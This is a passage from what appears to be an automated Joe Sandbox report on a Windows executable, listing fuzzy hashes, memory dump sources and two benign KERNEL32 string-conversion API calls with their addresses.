                                                          • Opcode Fuzzy Hash: c2db9fb792587dd2d9468330fdd1f80c523789875752ab40f1d827bf2748e16b
                                                          • Instruction Fuzzy Hash: D2D0C9327C13507AE664B7719C0FFDA76549B14B14F404A16B685AA1D0DAE0A8818A94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0015BE93
                                                          • GetLastError.KERNEL32 ref: 0015BEA1
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0015BEFC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 7c57fd893365150a80130df5c6e4433d83d7c1b1553cdf15e65da589debf095f
                                                          • Instruction ID: 0471ab87726805758aa9d8bd595cedde14e80c2ddfdc93121e0e8e9cb240b17d
                                                          • Opcode Fuzzy Hash: 7c57fd893365150a80130df5c6e4433d83d7c1b1553cdf15e65da589debf095f
                                                          • Instruction Fuzzy Hash: FE41E634608206EFCF258F64CC85ABA7BA4EF41312F15416AFD695F1E1DB308C09CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%